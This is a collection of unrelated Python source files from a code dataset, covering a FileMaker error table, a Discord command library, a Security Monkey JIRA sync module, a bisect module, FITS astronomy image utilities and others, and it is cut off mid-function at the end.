958: 'Parameter missing (returned only by web-published databases)',
971: 'The user name is invalid',
972: 'The password is invalid',
973: 'The database is invalid',
974: 'Permission Denied',
975: 'The field has restricted access',
976: 'Security is disabled',
977: 'Invalid client IP address',
978: 'The number of allowed guests has been exceeded',
1200: 'Generic calculation error',
1201: 'Too few parameters in the function',
1202: 'Too many parameters in the function',
1203: 'Unexpected end of calculation',
1204: 'Number, text constant, field name or "(" expected',
1205: 'Comment is not terminated with "*/"',
1206: 'Text constant must end with a quotation mark',
1207: 'Unbalanced parenthesis',
1208: 'Operator missing, function not found or "(" not expected',
1209: 'Name (such as field name or layout name) is missing',
1210: 'Plug-in function has already been registered',
1211: 'List usage is not allowed in this function',
1212: 'An operator (for example, +, -, *) is expected here',
1213: 'This variable has already been defined in the Let function',
1214: 'AVERAGE, COUNT, EXTEND, GETREPETITION, MAX, MIN, NPV, '
'STDEV, SUM and GETSUMMARY: expression found where a field '
'alone is needed',
1215: 'This parameter is an invalid Get function parameter',
1216: 'Only Summary fields allowed as first argument in GETSUMMARY',
1217: 'Break field is invalid',
1218: 'Cannot evaluate the number',
1219: 'A field cannot be used in its own formula',
1220: 'Field type must be normal or calculated',
1221: 'Data type must be number, date, time, or timestamp',
1222: 'Calculation cannot be stored',
1223: 'The function referred to does not exist',
1400: 'ODBC driver initialization failed; make sure the ODBC '
'drivers are properly installed',
1401: 'Failed to allocate environment (ODBC)',
1402: 'Failed to free environment (ODBC)',
1403: 'Failed to disconnect (ODBC)',
1404: 'Failed to allocate connection (ODBC)',
1405: 'Failed to free connection (ODBC)',
1406: 'Failed check for SQL API (ODBC)',
1407: 'Failed to allocate statement (ODBC)',
1408: 'Extended error (ODBC)',
}
def __init__(self, code=-1):
if not code in self.error_codes:
code = -1
self.message = 'FileMaker Error: {0}: {1}'.format(
code, self.error_codes.get(code))
def __str__(self):
return self.message
| StarcoderdataPython |
3387251 | <gh_stars>1-10
import typing
from TorchTSA.simulate.GARCHSim import GARCHSim
class ARCHSim(GARCHSim):
def __init__(
self,
_alpha_arr: typing.Union[float, typing.Sequence[float]],
_const: float, _mu: float = 0.0,
):
if isinstance(_alpha_arr, float) or isinstance(_alpha_arr, int):
_alpha_arr = (_alpha_arr,)
super().__init__(
_alpha_arr=_alpha_arr, _beta_arr=(),
_const=_const, _mu=_mu
)
| StarcoderdataPython |
6477219 | <filename>test_run_generated.py<gh_stars>10-100
from fable_sedlex.sedlex import from_ustring, lexbuf
from generated import lex, lexall, Token
buf = from_ustring(r'123 2345 + += 2.34E5 "sada\"sa" ')
tokens = []
EOF_ID = 0
def is_eof(x: Token):
return x.token_id == 0
print()
print(list(lexall(buf, Token, is_eof)))
| StarcoderdataPython |
1745951 | <filename>lifesaver/commands/core.py
# encoding: utf-8
__all__ = ["SubcommandInvocationRequired", "Command", "Group", "command", "group"]
from discord.ext import commands
class SubcommandInvocationRequired(commands.CommandError):
"""A :class:`discord.ext.commands.CommandError` that is subclass raised when a subcommand needs to be invoked."""
class Command(commands.Command):
"""A :class:`discord.ext.commands.Command` subclass that implements additional features."""
def __init__(self, *args, typing: bool = False, **kwargs) -> None:
super().__init__(*args, **kwargs)
#: Specifies whether to send typing indicators while the command is running.
self.typing = typing
async def invoke(self, ctx):
if self.typing:
async with ctx.typing():
await super().invoke(ctx)
else:
await super().invoke(ctx)
class Group(commands.Group, Command):
"""A :class:`discord.ext.commands.Group` subclass that implements additional features."""
def __init__(self, *args, hollow: bool = False, **kwargs) -> None:
super().__init__(*args, **kwargs)
#: Specifies whether a subcommand must be invoked.
self.hollow = hollow
async def invoke(self, ctx):
if ctx.view.eof and self.hollow:
# If we're at the end of the view (meaning there's no more words,
# so it's impossible to have a subcommand specified), and we need
# a subcommand, raise.
raise SubcommandInvocationRequired()
await super().invoke(ctx)
def command(self, *args, **kwargs):
def decorator(func):
kwargs.setdefault("parent", self)
result = command(*args, **kwargs)(func)
self.add_command(result)
return result
return decorator
def group(self, *args, **kwargs):
def decorator(func):
kwargs.setdefault("parent", self)
result = group(*args, **kwargs)(func)
self.add_command(result)
return result
return decorator
def command(name: str = None, cls=Command, **kwargs):
"""The command decorator.
Works exactly like :func:`discord.ext.commands.command`.
You can pass the ``typing`` keyword argument to wrap the entire command
invocation in a :meth:`discord.ext.commands.Context.typing`, making the
bot type for the duration the command runs.
"""
return commands.command(name, cls, **kwargs)
def group(name: str = None, **kwargs):
"""The command group decorator.
Works exactly like :func:`discord.ext.commands.group`.
You can pass the ``hollow`` keyword argument in order to force the command invoker to
specify a subcommand (raises :class:`lifesaver.commands.SubcommandInvocationRequired`).
"""
return command(name, Group, **kwargs)
| StarcoderdataPython |
3212381 | from enum import Enum
THUMBS_UP = '+' # in case you go f-string ...
class Score(Enum):
BEGINNER = 2
INTERMEDIATE = 3
ADVANCED = 4
CHEATED = 1
def __str__(self):
return f'{self.name} => {THUMBS_UP * self.value}'
@classmethod
def average(cls):
return sum([score.value for score in cls]) / len(cls.__members__)
if __name__ == "__main__":
for score in Score:
print(f'{score.name:12} : {score.value}')
print(list(Score.__members__))
| StarcoderdataPython |
1808269 | <reponame>boladmin/security_monkey
"""
.. module: security_monkey.jirasync
:platform: Unix
:synopsis: Creates and updates JIRA tickets based on current issues
.. version:: $$VERSION$$
.. moduleauthor:: <NAME> <<EMAIL>>
"""
import datetime
import re
import time
import urllib.request, urllib.parse, urllib.error
import yaml
from jira.client import JIRA
from security_monkey.datastore import Account, Technology, AuditorSettings
from security_monkey import app
class JiraSync(object):
""" Syncs auditor issues with JIRA tickets. """
def __init__(self, jira_file):
try:
with open(jira_file) as jf:
data = jf.read()
data = yaml.safe_load(data)
self.account = data['account']
self.password = data['password']
self.project = data['project']
self.server = data['server']
self.issue_type = data['issue_type']
self.url = data['url']
self.ip_proxy = data.get('ip_proxy')
self.port_proxy = data.get('port_proxy')
self.disable_transitions = data.get('disable_transitions', False)
self.assignee = data.get('assignee', None)
self.only_update_on_change = data.get('only_update_on_change', False)
except KeyError as e:
raise Exception('JIRA sync configuration missing required field: {}'.format(e))
except IOError as e:
raise Exception('Error opening JIRA sync configuration file: {}'.format(e))
except yaml.scanner.ScannerError as e:
raise Exception('JIRA sync configuration file contains malformed YAML: {}'.format(e))
try:
options = {}
options['verify'] = app.config.get('JIRA_SSL_VERIFY', True)
proxies = None
if (self.ip_proxy and self.port_proxy):
proxy_connect = '{}:{}'.format(self.ip_proxy, self.port_proxy)
proxies = {'http': proxy_connect, 'https': proxy_connect}
elif (self.ip_proxy and self.port_proxy is None):
app.logger.warn("Proxy host set, but not proxy port. Skipping JIRA proxy settings.")
elif (self.ip_proxy is None and self.port_proxy):
app.logger.warn("Proxy port set, but not proxy host. Skipping JIRA proxy settings.")
self.client = JIRA(self.server, basic_auth=(self.account, self.password), options=options, proxies=proxies) # pylint: disable=E1123
except Exception as e:
raise Exception("Error connecting to JIRA: {}".format(str(e)[:1024]))
def close_issue(self, issue):
try:
self.transition_issue(issue, app.config.get('JIRA_CLOSED', 'Closed'))
except Exception as e:
app.logger.error('Error closing issue {} ({}): {}'.format(issue.fields.summary, issue.key, e))
def open_issue(self, issue):
try:
self.transition_issue(issue, app.config.get('JIRA_OPEN', 'Open'))
except Exception as e:
app.logger.error('Error opening issue {} ({}): {}'.format(issue.fields.summary, issue.key, e))
def transition_issue(self, issue, transition_name):
transitions = self.client.transitions(issue)
for transition in transitions:
if transition['name'].lower() == transition_name.lower():
break
else:
app.logger.error('No transition {} for issue {}'.format(transition_name, issue.key))
return
self.client.transition_issue(issue, transition['id'])
def add_or_update_issue(self, issue, technology, account, count):
""" Searches for existing tickets based on the summary. If one exists,
it will update the count and preserve any leading description text. If not, it will create a ticket. """
summary = '{0} - {1} - {2}'.format(issue, technology, account)
# Having dashes in JQL cuases it to return no results
summary_search = summary.replace('- ', '')
jql = 'project={0} and summary~"{1}"'.format(self.project, summary_search)
issues = self.client.search_issues(jql)
url = "{0}/#/issues/-/{1}/{2}/-/-/-/True/{3}/1/25".format(self.url, technology, account, urllib.parse.quote(issue, ''))
timezone = time.tzname[time.localtime().tm_isdst]
description = ("This ticket was automatically created by Security Monkey. DO NOT EDIT SUMMARY OR BELOW THIS LINE\n"
"Number of issues: {0}\n"
"Account: {1}\n"
"[View on Security Monkey|{2}]\n"
"Last updated: {3} {4}".format(count, account, url, datetime.datetime.now().isoformat(), timezone))
for issue in issues:
# Make sure we found the exact ticket
if issue.fields.summary == summary:
old_desc = issue.fields.description
old_desc = old_desc[:old_desc.find('This ticket was automatically created by Security Monkey')]
if self.only_update_on_change and issue.fields.description:
old_count = re.search("Number of issues: (\d*)\\n", issue.fields.description).group(1)
if int(old_count) != count:
# The count has changed so it still needs to be updated
issue.update(description=old_desc + description)
app.logger.debug("Updated issue {} ({})".format(summary, issue.key))
else:
# The count hasn't changed so it will not be updated
app.logger.debug('Not updating issue, configured to only update if the count has changed.')
else:
issue.update(description=old_desc + description)
app.logger.debug("Updated issue {} ({})".format(summary, issue.key))
if self.disable_transitions:
return
if issue.fields.status.name == app.config.get('JIRA_CLOSED', 'Closed') and count:
self.open_issue(issue)
app.logger.debug("Reopened issue {} ({})".format(summary, issue.key))
elif issue.fields.status.name != app.config.get('JIRA_CLOSED', 'Closed') and count == 0:
self.close_issue(issue)
app.logger.debug("Closed issue {} ({})".format(summary, issue.key))
return
# Don't open a ticket with no issues
if count == 0:
return
jira_args = {'project': {'key': self.project},
'issuetype': {'name': self.issue_type},
'summary': summary,
'description': description}
if self.assignee is not None:
jira_args['assignee'] = {'name': self.assignee}
try:
issue = self.client.create_issue(**jira_args)
app.logger.debug("Created issue {} ({})".format(summary, issue.key))
except Exception as e:
app.logger.error("Error creating issue {}: {}".format(summary, e))
def sync_issues(self, accounts=None, tech_name=None):
""" Runs add_or_update_issue for every AuditorSetting, filtered by technology
and accounts, if provided. """
query = AuditorSettings.query.join(
(Technology, Technology.id == AuditorSettings.tech_id)
).join(
(Account, Account.id == AuditorSettings.account_id)
).filter(
(AuditorSettings.disabled == False)
)
if accounts:
query = query.filter(Account.name.in_(accounts))
if tech_name:
query = query.filter(Technology.name == tech_name)
for auditorsetting in query.all():
unjustified = [issue for issue in auditorsetting.issues if not issue.justified]
self.add_or_update_issue(auditorsetting.issue_text,
auditorsetting.technology.name,
auditorsetting.account.name,
len(unjustified))
| StarcoderdataPython |
5053407 | <gh_stars>0
from pydantic import BaseSettings
class Settings(BaseSettings):
app_name: str = "default"
admin_email: str
token: str
database_url: str
class Config:
import os
is_prod = os.environ.get('IS_HEROKU', None)
if is_prod is None:
env_file = ".env" | StarcoderdataPython |
5044771 | <reponame>hroncok/rst2txt<gh_stars>1-10
# -*- coding: utf-8 -*-
from setuptools import setup
setup(
entry_points={
'console_scripts': [
'rst2txt = rst2txt:main',
],
},
use_scm_version=True,
)
| StarcoderdataPython |
1751472 | import gws
import gws.types as t
class ElementConfig(gws.WithAccess):
"""GWS client UI element configuration"""
tag: str #: element tag
before: str = '' #: insert before this tag
after: str = '' #: insert after this tag
class Config(gws.WithAccess):
"""GWS client configuration"""
options: t.Optional[dict] #: client options
elements: t.Optional[t.List[ElementConfig]] #: client UI elements
addElements: t.Optional[t.List[ElementConfig]] #: add elements to the parent element list
removeElements: t.Optional[t.List[ElementConfig]] #: remove elements from the parent element list
class ElementProps(gws.Data):
tag: str
class Props(gws.Data):
options: t.Optional[dict]
elements: t.Optional[t.List[ElementProps]]
class Element(gws.Node):
def props_for(self, user):
return ElementProps(tag=self.var('tag'))
class Object(gws.Node, gws.IClient):
options: dict
elements: t.List[Element]
def props_for(self, user):
return Props(options=self.options, elements=self.elements)
def configure(self):
parent_client = self.var('parentClient')
self.elements = self.create_children(Element, self._get_elements(parent_client))
opts = self.var('options')
if not opts and parent_client:
opts = gws.get(parent_client, 'options', {})
self.options = opts or {}
def _get_elements(self, parent_client):
elements = self.var('elements')
if elements:
return elements
if not parent_client:
return []
elements = list(gws.get(parent_client, 'elements', []))
add = self.var('addElements', default=[])
for c in add:
n = _find_element(elements, c.tag)
if n >= 0:
elements.pop(n)
if c.before:
n = _find_element(elements, c.before)
if n >= 0:
elements.insert(n, c)
elif c.after:
n = _find_element(elements, c.after)
if n >= 0:
elements.insert(n + 1, c)
else:
elements.append(c)
remove = self.var('removeElements', default=[])
remove_tags = [c.tag for c in remove]
return [e for e in elements if e.tag not in remove_tags]
def _find_element(elements, tag):
for n, el in enumerate(elements):
if el.tag == tag:
return n
return -1
| StarcoderdataPython |
1721179 | <gh_stars>100-1000
from ..utils.registry import Registry
DATASET_REGISTRY = Registry("dataset")
def build_dataset(cfg):
"""
Build the module with cfg.
Args:
cfg (dict): the config of the modules
Returns:
The built module.
"""
args = cfg
name = args.get("name")
dataset = DATASET_REGISTRY.get(name)(args)
return dataset
def list_datasets(name=None):
"""
List all available datasets
Args:
name: (TODO) list specific losses corresponds to a given name.
"""
return list(DATASET_REGISTRY._obj_map.keys()) | StarcoderdataPython |
1603704 | """Bisection algorithms."""
def insort(a, x, lo=0, hi=None):
"""Insert item x in list a, and keep it sorted assuming a is sorted."""
if hi is None:
hi = len(a)
while lo < hi:
mid = (lo+hi)/2
if x < a[mid]: hi = mid
else: lo = mid+1
a.insert(lo, x)
def bisect(a, x, lo=0, hi=None):
"""Find the index where to insert item x in list a, assuming a is sorted."""
if hi is None:
hi = len(a)
while lo < hi:
mid = (lo+hi)/2
if x < a[mid]: hi = mid
else: lo = mid+1
return lo
| StarcoderdataPython |
6656360 | <filename>src/make_video.py
# run as: python make_video.py
import numpy as np
import os
import matplotlib.pyplot as plt
fiber = 0
model = 0
ve_path = os.path.join('..', 've_files', f'model{model}_fiber{fiber}.dat')
print('ve_path: {}'.format(ve_path))
ve = -1*np.loadtxt(ve_path, skiprows=1)
coords_path = os.path.join('..', 'coords_files', f'{fiber}.dat')
coords = np.loadtxt(coords_path, skiprows=1)[:,-1]
fig, ax = plt.subplots()
fig, ax = plt.subplots()
ax.plot(coords, ve, 'k-')
plt.show()
# nnodes = len(ve)
# len_mm = 12.5 # [mm]
# d1Ve = np.diff(ve)/(len_mm/nnodes)
# d2Ve = np.diff(np.diff(ve)/(len_mm/nnodes))/(len_mm/nnodes) # [mV/mm**2]
# ax.plot(coords[:-1], d1Ve, 'b-')
# ax.plot(coords[:-2], d2Ve, 'g-')
# plt.show()
print('DONE') | StarcoderdataPython |
4898596 | from __future__ import print_function
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 10 13:18:46 2015
@author: nadiablago
"""
from matplotlib import pylab as plt
import glob
from astropy.io import fits as pf
import os, sys
from optparse import OptionParser
import matplotlib
import numpy as np
from astropy.wcs import WCS
from utils import zscale
from utils import time_utils
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-d", "--dir", action="store", type="string", dest="dir", metavar="Directory to be plotted", default=".")
parser.add_option("-a", "--ra", action="store", type="float", dest="ra", metavar="ra", default=0.0)
parser.add_option("-b", "--dec", action="store", type="float", dest="dec", metavar="dec", default=0.0)
parser.add_option("-p", "--pattern", action="store", type="string", dest="pattern", metavar="pattern", default="*.fits")
(options, args) = parser.parse_args()
if (None in options.__dict__.values()):
parser.print_help()
sys.exit(0)
mydir = options.__dict__['dir']
plot_dir = os.path.join(mydir, "png")
ra = options.__dict__['ra']
dec = options.__dict__['dec']
pattern = options.__dict__['pattern']
print (ra, dec)
if (not os.path.isdir(plot_dir)):
os.makedirs(plot_dir)
for f in glob.glob(mydir + "/" + pattern):
print ("Plotting",os.path.basename(f).replace(".fits", ".png"))
hdulist = pf.open(f)
if len(hdulist)>1:
indices = np.arange(len(hdulist)-1)+1
else:
indices = np.array([0])
for i in indices:
prihdr = hdulist[i].header
img = hdulist[i].data * 1.
nx, ny = img.shape
if (ra * dec != 0):
# Get pixel coordinates of SN
wcs = WCS(prihdr)
try:
target_pix = wcs.wcs_sky2pix([(np.array([ra,dec], np.float_))], 1)[0]
except:
print ("ERROR when converting sky to wcs. Is astrometry in place? Default coordinates assigned.")
target_pix = [+nx/2., ny/2.]
print (target_pix)
else:
target_pix = [+nx/2., ny/2.]
img = img - np.nanmin(img)
av = np.median(img.flatten())
mi, ma = zscale.zscale(img)
im = plt.imshow(plt.log10(img), aspect="equal", extent=(0, ny, 0, nx), \
origin="lower", cmap=matplotlib.cm.gray_r, interpolation="none", vmin=np.log10(av), vmax=np.log10(3*av)) #, interpolation="lanczos")
plt.scatter(target_pix[0], target_pix[1], marker="x", s=10, c="red")
plt.colorbar(im)
filename = os.path.basename(f)
plt.savefig(os.path.join(plot_dir, filename.replace("."+filename.split(".")[-1], "_{:}.png".format(i))), dpi=200)
plt.clf()
def move_to_discarded(mydir, myfilter, ra, dec):
import shutil
for f in glob.glob(os.path.join(mydir, myfilter)):
frames_with_target = get_frames_with_target(f, ra, dec)
if len(frames_with_target) == 0:
discarddir = os.path.join(mydir, "discarded")
if (not os.path.isdir(discarddir)):
print ("Creating directory for discarded files (with no target)")
os.makedirs(discarddir)
print ("Moving file ",f," to discarded directory",discarddir)
shutil.move(f, os.path.join(discarddir, os.path.basename(f)))
else:
print ("Object found in frames", frames_with_target, " in file ",f)
print ("Extracting this field")
extract_field_from_moscaic(mydir, os.path.basename(f), frames_with_target, origname=True)
def get_frames_with_target(myfile, ra, dec, debug=False):
hdulist = pf.open(myfile)
if len(hdulist)>1:
indices = np.arange(len(hdulist)-1)+1
else:
indices = np.array([0])
frames = []
for i in indices:
prihdr = hdulist[i].header
img = hdulist[i].data * 1.
ny, nx = img.shape
if (ra * dec != 0):
# Get pixel coordinates of SN
wcs = WCS(prihdr)
try:
target_pix = wcs.wcs_sky2pix([(np.array([ra,dec], np.float_))], 1)[0]
except:
print ("ERROR when converting sky to wcs. Is astrometry in place? Default coordinates assigned.")
target_pix = [+nx/2., ny/2.]
if debug: print (i, target_pix)
else:
target_pix = [+nx/2., ny/2.]
if (target_pix[0] > 0 and target_pix[0]<nx) and (target_pix[1] > 0 and target_pix[1]<ny):
frames.append(i)
return np.array(frames)
def cut_frame_with_target(myfile, ra, dec, h=4000, w=2000, debug=False):
hdulist = pf.open(myfile)[0]
img = hdulist.data * 1.
img = img.T
nx, ny = img.shape
if (ra * dec != 0):
# Get pixel coordinates of SN
wcs = WCS(hdulist.header)
try:
target_pix = wcs.wcs_sky2pix([(np.array([ra,dec], np.float_))], 1)[0]
except:
print ("ERROR when converting sky to wcs. Is astrometry in place? Default coordinates assigned.")
target_pix = [+nx/2., ny/2.]
if debug: print (i, target_pix)
else:
target_pix = [+nx/2., ny/2.]
#If contained in the frame
if (target_pix[0] > 0 and target_pix[0]<nx) and (target_pix[1] > 0 and target_pix[1]<ny):
xmin = np.maximum(0, target_pix[0]-w/2.)
xmax = np.minimum(nx, target_pix[0]+w/2.)
ymin = np.maximum(0, target_pix[1]-h/2.)
ymax = np.minimum(ny, target_pix[1]+h/2.)
print ("Target", target_pix, xmin, xmax, ymin, ymax)
newhdu = pf.PrimaryHDU()
newhdu.header = hdulist.header
newhdu.data = hdulist.data[ymin:ymax,xmin:xmax]
newname = os.path.join(os.path.dirname(myfile),"out.fits")
newhdu.writeto(newname, output_verify="fix", overwrite=False)
print ("Extracted region around target and stored to ",newname)
else:
print ("Target not in the frame!")
def extract_field_from_moscaic(mydir, myfilter, nfields=None, origname=False):
if np.isscalar(nfields):
nfields = np.array([nfields])
for i, f in enumerate(glob.glob(mydir + "/" + myfilter)):
hdulist = pf.open(f)
if nfields==None:
nfields = np.arange(len(hdulist)-1)+1
for n in nfields:
hdu = hdulist[n]
hdu.header = hdulist[0].header + hdulist[n].header
hduheader = pf.PrimaryHDU()
hduheader.header = hdu.header
hduheader.data = hdu.data
hdulist1 = pf.HDUList([hduheader, hdu])
if origname:
name = os.path.basename(f)
name = name.replace(".fits", "_%d.fits")
hdulist1.writeto(name%(n), output_verify="fix", overwrite=True)
else:
hdulist1.writeto("out%d_%d.fits"%(i,n), output_verify="fix", overwrite=True)
def unify_header(prihdr):
'''
Reads the different fields from different telescopes and unifies them under common names.
'''
dic = {"GAIN":0, "RDNOISE":0, "AIRMASS":0, "EXPTIME":0, "AIRMASS":0, "FILTER":0, "MJD-OBS":0}
filters = {"SDSS-G":"g", "SDSS-R":"r", "SDSS-I":"i", "SDSS-Z":"z"}
try:
telescope = prihdr["TELESCOP"]
print ("telescope: %s detected!"%telescope)
except KeyError:
try:
telescope = prihdr["HIERARCH FPA.TELESCOPE"]
except:
print ("Could not locate the telescope field")
return
#Compute the pixel size
wcs = WCS(prihdr)
world0 = wcs.wcs_pix2world([[0,0]], 1)
world1 = wcs.wcs_pix2world([[1,1]], 1)
pixsize = (world1 - world0)[0][1]*3600 #arcsec / pix
dic["PIXSCALE"] = pixsize
if telescope == "NOT":
dic["EXPTIME"] = prihdr["EXPTIME"]
dic["AIRMASS"] = prihdr["AIRMASS"]
dic["MJD-OBS"] = time_utils.utc2mjd(prihdr["DATE-OBS"])
if prihdr["INSTRUME"]=="StanCam":
dic["FILTER"] = prihdr["STFLTNM"][0]
dic["GAIN"] = prihdr["GAIN"]
dic["RDNOISE"] = prihdr["RDNOISE"]
elif prihdr["INSTRUME"]=="NOTCAM":
dic["GAIN"] = prihdr["GAIN1"]
dic["RDNOISE"] = prihdr["RDNOISE1"]
dic["FILTER"] = prihdr["NCFLTNM2"]
elif telescope == "UKIRT":
dic["GAIN"] = prihdr["GAIN"]
dic["RDNOISE"] = prihdr["READNOIS"]
dic["EXPTIME"] = prihdr["EXP_TIME"]
dic["AIRMASS"] = prihdr["AMSTART"]
dic["FILTER"] = prihdr["FILTER"]
dic["MJD-OBS"] = prihdr["MJD-OBS"]
elif telescope == "PS1":
dic["GAIN"] = prihdr["HIERARCH CELL.GAIN"]
dic["RDNOISE"] = prihdr["HIERARCH CELL.READNOISE"]
dic["EXPTIME"] = prihdr["EXPTIME"]
dic["AIRMASS"] = prihdr["AIRMASS"]
dic["FILTER"] = prihdr["HIERARCH FPA.FILTERID"]
dic["MJD-OBS"] = prihdr["MJD-OBS"]
elif telescope == "INT":
dic["GAIN"] = prihdr["GAIN"]
if ("RDNOISE" in prihdr.keys()):
dic["RDNOISE"] = prihdr["RDNOISE"]
else:
dic["RDNOISE"] = prihdr["READNOIS"]
dic["EXPTIME"] = prihdr["EXPTIME"]
dic["AIRMASS"] = prihdr["AIRMASS"]
dic["FILTER"] = prihdr["WFFBAND"]
dic["MJD-OBS"] = prihdr["MJD-OBS"]
elif telescope == "WHT":
if prihdr["INSTRUME"]=="ACAM":
dic["GAIN"] = prihdr["GAIN"]
dic["RDNOISE"] = prihdr["READNOIS"]
dic["EXPTIME"] = prihdr["EXPTIME"]
dic["AIRMASS"] = prihdr["AIRMASS"]
dic["FILTER"] = prihdr["ACAMFILT"]
dic["MJD-OBS"] = prihdr["MJD-OBS"]
if "ISIS" in prihdr["INSTRUME"]:
dic["GAIN"] = prihdr["GAIN"]
dic["RDNOISE"] = prihdr["READNOIS"]
dic["EXPTIME"] = prihdr["EXPTIME"]
dic["AIRMASS"] = prihdr["AIRMASS"]
dic["FILTER"] = prihdr["ISIFILTA"].replace(".","")
dic["FILTER2"] = prihdr["ISIFILTB"].replace(".","")
dic["MJD-OBS"] = prihdr["MJD-OBS"]
dic["GRISM"] = prihdr["ISIGRAT"]
dic["SLIT"] = prihdr["ISISLITW"]
elif telescope == "CFHT 3.6m":
dic["GAIN"] = prihdr["GAIN"]
dic["RDNOISE"] = prihdr["RDNOISE"]
dic["EXPTIME"] = prihdr["EXPTIME"]
dic["AIRMASS"] = prihdr["AIRMASS"]
dic["FILTER"] = prihdr["FILTER"]
dic["MJD-OBS"] = prihdr["MJD-OBS"]
elif telescope == "Liverpool Telescope":
dic["GAIN"] = prihdr["GAIN"]
dic["RDNOISE"] = prihdr["READNOIS"]
dic["EXPTIME"] = prihdr["EXPTIME"]
dic["AIRMASS"] = prihdr["AIRMASS"]
dic["FILTER"] = filters.get(prihdr["FILTER1"], prihdr["FILTER1"])
dic["MJD-OBS"] = prihdr["MJD"]
elif telescope == "GTC":
if (prihdr["INSTRUME"]=="OSIRIS"):
dic["GAIN"] = prihdr["GAIN"]
dic["EXPTIME"] = prihdr["EXPTIME"]
dic["AIRMASS"] = prihdr["AIRMASS"]
dic["FILTER"] = filters.get(prihdr["FILTER1"], prihdr["FILTER1"])
dic["MJD-OBS"] = prihdr["MJD-OBS"]
dic["GRISM"] = prihdr["GRISM"]
dic["SLIT"] = prihdr["SLITW"]
speed = prihdr["RSPEED"]
#From http://www.gtc.iac.es/instruments/osiris/osiris.php
if (speed == 200):
dic["RDNOISE"] = 4.5
elif (speed == 100):
dic["RDNOISE"] = 3.5
else:
dic["RDNOISE"] = 9
elif telescope == "Palomar 200":
if (prihdr["INSTRUME"]=="WIRC"):
dic["GAIN"] = prihdr["GAIN"]
dic["EXPTIME"] = prihdr["EXPTIME"]
dic["AIRMASS"] = prihdr["AIRMASS"]
dic["FILTER"] = prihdr["FILTER"]
dic["MJD-OBS"] = prihdr["MJD"]
dic["RDNOISE"] = prihdr["EFFRN"]
elif telescope == "Keck II":
if (prihdr["CURRINST"]=="NIRC2"):
dic["GAIN"] = prihdr["GAIN"]
dic["EXPTIME"] = prihdr["ITIME"] * prihdr["COADDS"]
dic["AIRMASS"] = prihdr["AIRMASS"]
dic["FILTER"] = prihdr["FILTER"]
dic["MJD-OBS"] = prihdr["MJD-OBS"]
dic["RDNOISE"] = prihdr["RDNOISE"]
elif telescope == "1m0-09":
dic["GAIN"] = prihdr["GAIN"]
dic["EXPTIME"] = prihdr["EXPTIME"]
dic["AIRMASS"] = prihdr["AIRMASS"]
dic["FILTER"] = prihdr["FILTER"]
dic["MJD-OBS"] = prihdr["MJD-OBS"]
dic["RDNOISE"] = prihdr["RDNOISE"]
else:
print ("Telescope unknown!")
for i, k in enumerate(dic.keys()):
if not k in prihdr.keys():
prihdr[k] = dic[k]
return prihdr
def unify_fits(myfits, overwrite=False, field=-1):
'''
Creates a unified standard version of the fits file header, creating standard fields for the most used fields.
'''
hdulist = pf.open(myfits)
print (hdulist.info())
nfields = len(hdulist)
datafields = 0
for n in range(nfields):
if (not hdulist[n].data is None):
datafields +=1
if nfields > 1:
if (field==-1 and datafields>1):
print ("WARNING, there are several images stored. Plsease, specify which number you want to extract.")
print ("Exiting...")
return
nfields = np.arange(len(hdulist)-1)+1
hdu = hdulist[0]
for n in nfields:
hdu.header = hdu.header + hdulist[n].header
hdu.data = hdulist[field].data
else:
hdu = hdulist[0]
new_header = unify_header(hdu.header)
primhdu = pf.PrimaryHDU(header = new_header, data = hdu.data)
hdulist = pf.HDUList([primhdu])
if (overwrite):
hdulist.writeto(myfits, overwrite=True)
else:
obj = hdulist[0].header["OBJECT"].replace(" ","")
filt = hdulist[0].header["FILTER"]
inst = hdulist[0].header["INSTRUME"].replace(" ","")
try:
slit = "_%.1f" % hdulist[0].header["SLIT"]
grism = "_" + hdulist[0].header["GRISM"].replace(".", "")
except:
slit = ""
grism = ""
name = "%s_%s%s%s_%s_1.fits"%(obj, inst,grism, slit, filt)
while os.path.isfile(name):
seq = int(name.split("_")[-1].replace(".fits", ""))
name = name.replace("_%d.fits"%seq, "_%d.fits"%(seq+1))
hdulist.writeto(name, overwrite=False)
def get_par(myfits, par, ext=0):
'''
Returns the header parameter from the fits.
'''
try:
hdu = pf.open(myfits, ignore_missing_end=True)
header = hdu[ext].header
if str.upper(par) in header.keys():
return header[str.upper(par)]
else:
return None
except IOError:
return None
def update_par(myfits, par, value, ext=0):
'''
Updates the fits files with the new parameter.
'''
hdu = pf.open(myfits, ignore_missing_end=True)
header = hdu[ext].header
header.set(par, value)
hdu.writeto(myfits, overwrite=True)
def update_pars(myfits, pardic, ext=0):
'''
Updates the fits files with the new parameter.
'''
hdu = pf.open(myfits, ignore_missing_end=True)
header = hdu[ext].header
for key, value in pardic.iteritems():
header.set(key, value)
hdu.writeto(myfits, overwrite=True)
def has_par(myfits, par, ext=0):
'''
Updates the fits files with the new parameter.
'''
hdu = pf.open(myfits, ignore_missing_end=True)
header = hdu[ext].header
return par in header.keys()
def arrange_fits_in_directories(mydir, myfilter, destdir):
'''
Automatically sorts the fits files ina directory structure with the filter name as the fierst level, and the integer of the MJD of the observation at
the second level.
mydir: where the files to be sorted are.
myfilter: what filter applies to find them.
destdir: whhich is the main level directory where fiels should be moved to.
'''
import shutil
for f in glob.glob(os.path.join(mydir, myfilter)):
header = pf.open(f)[0].header
filt = header["FILTER"]
mjd = int(header["MJD-OBS"])
instrument = header["INSTRUME"]
destination = os.path.join(destdir, "%s/%s/%d"%(instrument,filt, mjd))
if (not os.path.isdir(destination) ):
os.makedirs(destination)
print ("Creating directory", destination)
shutil.move(f, os.path.join(destination, os.path.basename(f)))
def get_gain_ron(fitsfile):
hdulist = pf.open(fitsfile, ignore_missing_end=True)
prihdr = hdulist[0].header
uheader = unify_header(prihdr)
gain = uheader["GAIN"]
ron = uheader["RDNOISE"]
return gain, ron
def get_gain_ron_combined_i(gain, ron, n, mode="median"):
'''
Returns the combined gain and read out noise for different modes of combining images.
Avaialable modes: (sum, average, median)
'''
if (n==1):
return gain, ron
if (mode=="sum"):
gain=gain
ron = np.sqrt(n)*ron
elif(mode=="average"):
gain = 1.*n*gain
ron = np.sqrt(n)*ron
elif(mode=="median"):
gain = 2.*n*gain/3.
ron = np.sqrt(2.*n/3)*ron
else:
print ("Unknown selected mode. Avaialable values: (sum, average, median)")
print (np.round(gain, 5), np.round(ron, 5))
return np.round(gain, 5), np.round(ron, 5)
def get_gain_ron_combined(fitsfile, n, mode="median"):
gain, ron = get_gain_ron(fitsfile)
return get_gain_ron_combined_i(gain,ron,n,mode)
def align_combine(fitsdir, myfilter, examine=True):
from pyraf import iraf
